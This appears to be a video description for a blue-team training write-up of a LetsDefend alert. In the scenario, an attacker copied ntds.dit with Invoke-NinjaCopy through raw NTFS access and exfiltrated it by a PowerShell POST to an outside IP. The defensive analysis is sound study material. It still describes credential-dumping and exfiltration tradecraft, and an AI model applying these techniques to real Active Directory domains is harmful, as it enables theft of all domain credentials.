Unauthorized NTDS.dit Access — NinjaCopy Exfil, Full Domain Creds at Risk | LetsDefend SOC314

Опубликовано: 16 Май 2026
на канале: InkSec

Day 116 of Becoming a SOC Analyst — SOC314 Unauthorized Access to NTDS.dit File Detected (True Positive)
Attacker at 185.107.56.72 RDP'd directly into dual-NIC EC2 instance Paul via its exposed AWS-facing NIC (172.31.30.36), bypassing internal perimeter controls entirely. Invoke-NinjaCopy.ps1 was downloaded to C:\temp and used to copy ntds.dit via raw NTFS volume access — deliberately avoiding Windows file API hooks — before exfiltration via PowerShell Invoke-WebRequest POST to 185.107.56.72:8000/upload. Combined with the SYSTEM hive, the stolen ntds.dit enables full offline domain credential extraction — exfil was allowed at execution time, endpoint subsequently isolated.
🔬 Analysis Reports
🦠 VirusTotal (NinjaCopy) → https://www.virustotal.com/gui/url/de...
🔍 AbuseIPDB (185.107.56.72) → https://www.abuseipdb.com/check/185.1...
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #NTDSdit #NinjaCopy #CredentialDumping #ActiveDirectory #RDP #IncidentResponse #SIEM #Day116 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity